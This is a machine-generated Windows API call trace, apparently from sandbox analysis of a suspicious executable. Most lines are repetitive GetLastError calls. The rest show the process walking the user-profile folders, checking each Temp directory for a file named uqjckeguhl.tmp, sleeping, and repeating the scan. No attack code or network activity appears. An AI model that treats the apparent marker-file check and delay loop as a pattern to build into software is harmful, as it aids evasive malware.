	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.349] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.350] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.351] GetLastError () returned 0x7a
	[0070.352] GetLastError () returned 0x7a
	[0070.352] GetLastError () returned 0x7a
	[0070.352] GetLastError () returned 0x7a
	[0070.352] GetLastError () returned 0x7a
	[0070.352] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0070.352] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.352] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.353] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0070.354] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.354] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.354] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0070.355] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.355] GetLastError () returned 0x3
	[0070.356] GetLastError () returned 0x3
	[0070.356] GetLastError () returned 0x3
	[0070.356] GetLastError () returned 0x3
	[0070.356] GetLastError () returned 0x3
	[0070.356] GetLastError () returned 0x3
	[0070.356] GetLastError () returned 0x3
	[0070.356] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0070.356] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.360] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0070.360] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.361] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0070.361] lstrcmpW (lpString1="Default User", lpString2=".") returned 1
	[0070.361] lstrcmpW (lpString1="Default User", lpString2="..") returned 1
	[0070.361] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0070.361] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.363] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0070.363] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.364] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0070.364] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0070.364] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0070.364] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0070.364] lstrcmpW (lpString1="Nd9E1FYi", lpString2=".") returned 1
	[0070.364] lstrcmpW (lpString1="Nd9E1FYi", lpString2="..") returned 1
	[0070.364] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0070.365] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.365] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0070.365] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.365] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0070.365] lstrcmpW (lpString1="Public", lpString2=".") returned 1
	[0070.365] lstrcmpW (lpString1="Public", lpString2="..") returned 1
	[0070.366] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0070.366] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.366] wsprintfW (in: param_1=0x710bf8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0070.366] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0070.366] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0
	[0070.366] FindClose (in: hFindFile=0x726d80 | out: hFindFile=0x726d80) returned 1
	[0070.366] Sleep (dwMilliseconds=0x1388) 
	[0075.421] GetProfilesDirectoryW () returned 0x0
	[0075.422] GetProfilesDirectoryW () returned 0x1
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0x726f40
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.422] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0075.423] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0075.423] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0075.423] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.423] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0075.424] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.424] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
